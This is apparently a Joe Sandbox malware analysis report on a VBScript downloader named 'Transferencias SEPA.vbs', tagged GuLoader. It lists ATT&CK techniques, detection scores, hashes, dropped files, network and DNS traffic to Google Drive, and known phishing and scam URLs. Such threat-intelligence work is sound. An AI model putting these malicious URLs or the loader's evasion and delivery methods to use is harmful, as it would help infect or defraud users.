(toxophilism87 'sji p$ pe ign.endlube,rotilkbb beaca,rownlstddm:intragweanlematc,n amtmamaidinencydvgnosteinthrnl.ncedundfleresmelly,fossoniaevikinsdelmol pr,lo seedvmotoresgekrn teame.ddans renv=piptonstnkpeoverfwafvis-overdo da.hbfyrrejstorieheintcmultitenriq tropschec,y ordesekstetna abedrnu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Command and Scripting Interpreter | 221 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
Transferencias SEPA.vbs | 21% | ReversingLabs | Script-WScript.Trojan.Guloader
Transferencias SEPA.vbs | 14% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
bg.microsoft.map.fastly.net | 0% | Virustotal |
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 0% | Virustotal |
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.microsoft.co | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.53.35 | true | false | | unknown
drive.google.com | 173.194.219.101 | true | false | | high
drive.usercontent.google.com | 173.194.219.132 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1384995967.0000024901DF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://go.microsoft.co | powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.1384995967.00000249012E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.googP | powershell.exe, 00000002.00000002.1384995967.0000024901DB3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.google.com | powershell.exe, 00000002.00000002.1384995967.00000249018B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.googh | powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.google.com | powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
173.194.219.101 | drive.google.com | United States | 15169 | GOOGLEUS | false
173.194.219.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1427936
                                  Start date and time:2024-04-18 11:06:11 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 13s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Transferencias SEPA.vbs
                                  Detection:MAL
                                  Classification:mal96.expl.evad.winVBS@6/6@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 75%
                                  • Number of executed functions: 5
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 217.20.53.35, 23.40.205.34, 23.40.205.26
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                  • Execution Graph export aborted for target powershell.exe, PID 6536 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:07:04 | API Interceptor | 1x Sleep call for process: wscript.exe modified
11:07:06 | API Interceptor | 46x Sleep call for process: powershell.exe modified
                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | https://nsjw.newf.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse | 217.20.51.26
 | https://i18usgwgwrtjcshghwg.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=%201-844-324-0016 | Get hash | malicious | TechSupportScam | Browse | 217.20.48.36
 | SecuriteInfo.com.PUA.uTorrent.9217.19611.exe | Get hash | malicious | Unknown | Browse | 217.20.51.23
 | https://wmutqnzfeddd.pages.dev/smart89/ | Get hash | malicious | TechSupportScam | Browse | 217.20.51.34
 | DJWTW8Z47D.exe | Get hash | malicious | Mars Stealer, Vidar | Browse | 217.20.50.98
 | https://rts.ccmp.eu/rts/go2.aspx?h=1247107&tp=i-1NGB-Fb-EeO-1jnRvw-1c-PwWY-1c-1j0tsE-l8HoOHKMRi-iIE2M&x=readymoves.com.au/media/Imfs/%23Y2hlcnlsQGltZnMuY29tLmF1 | Get hash | malicious | Unknown | Browse | 217.20.51.22
 | bUAB.exe | Get hash | malicious | AsyncRAT, DcRat | Browse | 217.20.63.34
 | https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/EYsFsgLHWKJPpZNQ4wSBOOoBqo-z__F4rwbyNsnTrr6xBA?e=O3FtTX | Get hash | malicious | HTMLPhisher | Browse | 217.20.50.37
 | https://ethiocultural.com/choiys/ryosan.co.kr/efax/ | Get hash | malicious | HTMLPhisher | Browse | 217.20.54.36
 | https://domainkey.xxabg.cn/ | Get hash | malicious | Unknown | Browse | 217.20.54.37
bg.microsoft.map.fastly.net | FACTURA 130424435.vbs | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | justificant de transfer#U00e8ncia.vbs | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | Justificante de pago.vbs | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | awb_shipping_documents_17_04_2024_00000.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 199.232.214.172
 | http://185.91.69.110 | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | http://ranchpools.com | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 199.232.210.172
 | https://windowdefalerts-error0x21908-alert-virus-detected.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 199.232.210.172
 | https://windowdefalerts-error0x21902-alert-virus-detected.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 199.232.214.172
 | https://www.applelswlqod.top/all/login.php?idsmt=10123005600&nextfunck=10130550000 | Get hash | malicious | Unknown | Browse | 199.232.210.172
                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | shipping doc.vbs | Get hash | malicious | GuLoader | Browse | 173.194.219.101, 173.194.219.132
 | FACTURA 130424435.vbs | Get hash | malicious | Unknown | Browse | 173.194.219.101, 173.194.219.132
 | justificant de transfer#U00e8ncia.vbs | Get hash | malicious | Unknown | Browse | 173.194.219.101, 173.194.219.132
 | Justificante de pago.vbs | Get hash | malicious | Unknown | Browse | 173.194.219.101, 173.194.219.132
 | Purchase Order PDF.exe | Get hash | malicious | AgentTesla | Browse | 173.194.219.101, 173.194.219.132
 | Leoch-Purchase Order.exe | Get hash | malicious | AgentTesla | Browse | 173.194.219.101, 173.194.219.132
 | p silp AI240190.pdf.exe | Get hash | malicious | AgentTesla | Browse | 173.194.219.101, 173.194.219.132
 | SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe | Get hash | malicious | Unknown | Browse | 173.194.219.101, 173.194.219.132
 | SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exe | Get hash | malicious | AgentTesla | Browse | 173.194.219.101, 173.194.219.132
 | SecuriteInfo.com.Heur.15333.25205.exe | Get hash | malicious | AgentTesla | Browse | 173.194.219.101, 173.194.219.132
                                  No context
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                  Category:dropped
                                  Size (bytes):69993
                                  Entropy (8bit):7.99584879649948
                                  Encrypted:true
                                  SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                  MD5:29F65BA8E88C063813CC50A4EA544E93
                                  SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                  SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                  SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.135003979062184
                                  Encrypted:false
                                  SSDEEP:6:kK3E/lDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:PSlMkPlE99SNxAhUeVLVt
                                  MD5:A110E4BFBCFA4B91C2AF7137882FCFA5
                                  SHA1:956F6B2482AC5FB18EAA705A24C334CF5939754A
                                  SHA-256:AB3F3D924FB1ED97B2DC21519AE71381A6E115AA3F3905E233738FB7E80158C8
                                  SHA-512:FBEB77AFF3834D83C2192FE23EEB4F2843139A1A8D3F419D81C49C297CB53C93E8F96F517E933CEA2377502E9E1F2FB21499BE1E603918ECA95CC24CE55EFDC7
                                  Malicious:false
                                  Reputation:low
                                  Preview:p...... ........>...o...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllulbnolz:NllUc
                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                  Category:dropped
                                  Size (bytes):1692
                                  Entropy (8bit):5.104646886088985
                                  Encrypted:false
                                  SSDEEP:24:hazspnlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7plmRq+fjsueFYaWJ
                                  MD5:9A09A4CF62F2BFC7F591DC6047CBA450
                                  SHA1:6ADE60A73A796B747BBB377963C7BC1732C79900
                                  SHA-256:307066D2B0DACC5EAC6A183FA96594DE300D8F55A19EA84CBC962943477A325D
                                  SHA-512:248CFF39EA4275F44BA5000DA78CE8E33ADB4C9274F54D611CFAF4C3C68D6A78441E81EA6451C5B918343748592781E9E106BF156FF999EDF4584F657D775E2C
                                  Malicious:false
                                  Reputation:low
                                  Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="aBS227ATl29gnNNpUDUpSw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                                  File type:ASCII text, with CRLF line terminators
                                  Entropy (8bit):5.256207699332008
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:Transferencias SEPA.vbs
                                  File size:216'069 bytes
                                  MD5:73abc522ed981b48b4be2ba972900b68
                                  SHA1:986995bde37b8ac4daff9b88e5d9bdf4f6b82d72
                                  SHA256:f0ecd3e8f225833c8b6b7945c99e1f5c8a4ccb3332cfb4b7ab7b63d7d98d88f4
                                  SHA512:1039b707aa1d6194b0ffabbf5b3e0f5b369b2919f4a3b07097724568a748cd18a4e30b44f17be5cdbb90e0c5eb572eb4c4bad2be0b7214aca1de7371238360af
                                  SSDEEP:6144:PYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJf3nqo:c2dOXQEX
                                  TLSH:5D2419F0CF0B36199F4B3EDAAC6445924AF88195051238B5AAD917EDB283D2CE3FDD14
                                  File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb
                                  Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 11:07:08.469103098 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.469161034 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.469296932 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.479219913 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.479242086 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.698513985 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.698589087 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.699616909 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.699676037 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.704387903 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.704400063 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.704677105 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.716284037 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.760123968 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.927824974 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.927910089 CEST | 443 | 49707 | 173.194.219.101 | 192.168.2.11
Apr 18, 2024 11:07:08.927953959 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:08.930643082 CEST | 49707 | 443 | 192.168.2.11 | 173.194.219.101
Apr 18, 2024 11:07:09.037683964 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.037729025 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.037807941 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.038228035 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.038242102 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.290869951 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.290951967 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.293761015 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.293767929 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.294064999 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.294986963 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.340120077 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.944955111 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.945017099 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.945055008 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.945064068 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.945092916 CEST | 443 | 49708 | 173.194.219.132 | 192.168.2.11
Apr 18, 2024 11:07:09.945110083 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.945142984 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Apr 18, 2024 11:07:09.946854115 CEST | 49708 | 443 | 192.168.2.11 | 173.194.219.132
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 11:07:08.359011889 CEST | 64315 | 53 | 192.168.2.11 | 1.1.1.1
Apr 18, 2024 11:07:08.463291883 CEST | 53 | 64315 | 1.1.1.1 | 192.168.2.11
Apr 18, 2024 11:07:08.932665110 CEST | 50809 | 53 | 192.168.2.11 | 1.1.1.1
Apr 18, 2024 11:07:09.036909103 CEST | 53 | 50809 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 18, 2024 11:07:08.359011889 CEST | 192.168.2.11 | 1.1.1.1 | 0x54a8 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.932665110 CEST | 192.168.2.11 | 1.1.1.1 | 0x81aa | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.53.35 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.50.99 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.50.24 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.48.35 | A (IP address) | IN (0x0001) | false
